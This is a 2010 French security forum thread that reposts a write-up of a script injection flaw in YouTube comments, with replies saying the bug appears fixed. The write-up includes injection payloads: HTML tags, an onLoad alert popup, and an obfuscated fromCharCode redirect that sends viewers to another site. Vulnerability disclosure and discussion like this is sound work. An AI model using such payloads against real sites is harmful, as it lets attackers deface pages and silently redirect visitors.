ASafety - AntiSecurity Un projet qui vous tiendra @coeur...

Youtube HTML Code Injection

Questions, réponses, sujets divers, news et informations

Sujets en relation avec cet article

ASBot
 

Youtube HTML Code Injection

Message non lude x[@♥] » Lun 5 Juil 2010 07:35

Youtube HTML Code Injection

Une vulnérabilité indigne de YouTube à été découverte par TinKode sur les commentaires. Simple d'exploitation, il a illustré son utilisation par de simple code JS injecté :

Hello, in this article I’ll show you a little vulnerability in YOUTUBE.com more exactly it’s about HTML Code Injection.

What you can do with this? Hmm, you can use all HTML BB Codes in comments. And bonus a BIG popup. :D

How you can activate HTML in comments? It’s very simple. With:


Code: Tout sélectionner
    <script>HTML Code


Example:


Code: Tout sélectionner
    <script><h1> Visit Insecurity.Ro – ISR Security Team <blink><marquee><br><br>TinKode


And for popup:


Code: Tout sélectionner
    <script><BODY onLoad=”alert(‘Visit Insecurity.ro – TinKode’);”


If you want to make redirect:


Code: Tout sélectionner
    <script>Zbody onLoad=”document.write(‘<script>window.location = String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 105, 110, 115, 101, 99, 117, 114, 105, 116, 121, 46, 114, 111, 47);</script>’);”;


If you add this comment the page will be auto redirected to www.insecurity.ro








Src here:
Code: Tout sélectionner
http://blog.insecurity.ro/


:hat:
Temp...
Avatar de l’utilisateur
x[@♥]
 
Messages: 1115
Inscription: Lun 21 Sep 2009 15:21
Localisation: Sur la root

Re: Youtube HTML Code Injection

Message non lude Jill » Lun 5 Juil 2010 12:50

A priori bug fixed on peut plus publier ce genre de commentaires...
Jill
Jill
 
Messages: 57
Inscription: Jeu 1 Avr 2010 16:06

Re: Youtube HTML Code Injection

Message non lude x[@♥] » Lun 5 Juil 2010 13:52

Jill a écrit:A priori bug fixed on peut plus publier ce genre de commentaires...


Ça ne m'étonne pas qu'il n'est pas trainé! Par contre je suis étonné qu'elle n'est pas été détectée plus tôt. Surtout que les syntaxes sont loin d'être exotiques!

:hat:
Temp...
Avatar de l’utilisateur
x[@♥]
 
Messages: 1115
Inscription: Lun 21 Sep 2009 15:21
Localisation: Sur la root


Retourner vers Discussions



Qui est en ligne

Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 3 invités

cron